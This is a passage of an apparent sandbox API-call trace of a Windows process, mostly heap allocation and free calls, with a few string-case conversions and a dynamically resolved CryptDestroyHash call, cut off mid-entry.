1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.029] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.029] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0260.029] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.030] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.030] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.031] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.031] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.031] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.032] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.032] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.032] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0260.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e30 [0260.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0260.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0260.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.034] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0260.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0260.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.034] CryptDestroyHash (hHash=0xaa5860) returned 1 [0260.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0260.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0260.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.040] HeapFree (in: 